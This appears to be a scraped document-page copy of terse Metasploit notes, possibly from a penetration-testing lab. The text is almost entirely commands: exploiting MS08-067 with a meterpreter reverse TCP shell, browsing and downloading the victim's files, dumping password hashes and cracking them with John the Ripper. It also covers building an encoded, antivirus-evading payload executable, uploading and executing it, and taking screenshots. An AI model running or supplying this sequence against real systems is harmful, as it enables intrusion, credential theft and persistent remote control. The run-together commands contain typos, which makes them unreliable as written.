Download as txt, pdf, or txt
Download as txt, pdf, or txt
You are on page 1of 2

msfconsole search exploit/windows/smb/ms08_067_netapi use exploit/windows/smb/ms08_067_netapi show options set PAYLOAD windows/meterpreter/reverse_tcp set lhost 192.168.58.

130 set rhost 192.168.58.128 check vulns exploit help getuid getprivs getpid ps pwd cd c:\ ls pwd cd "Documents and Settings" ls cd username cd Desktop cat filename.txt download filename.txt help hashdump create a file and past the hashdump output and save the file open file in John the Ripper john filename.txt cd /pentest/password/john #./john /root/Desktop/filename.txt password will be decoded msfpayload (payload to use) (optoins of the payload) msfpayload -e (the encoder) -t (the type) -c (number of iterations) -o (output f ile) #msfpayload windows/meterpreter/reverse_tcp LMHOST=192.168.58.130 | msfencode -e x86/shikata_ga_nai -t exe -c 5 -o /root/test.exe type "background" at msfconsole meterpreter msf exploit(ms08_067_netapi)> msf exploit(ms08_067_netapi)> session -l msf exploit(ms08_067_netapi)> session -i <session number> meterpreter>upload test.exe upload text.exe (payload) to remote desktop meterpreter>screenshot run another msfconsole root# msfconsole msf>use exploit/multi/handler msf exploit(handler)> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST=192.168.58.130 msf exploit(handler)> exploit msf exploit(handler)> execute -f test.exe getuid

You might also like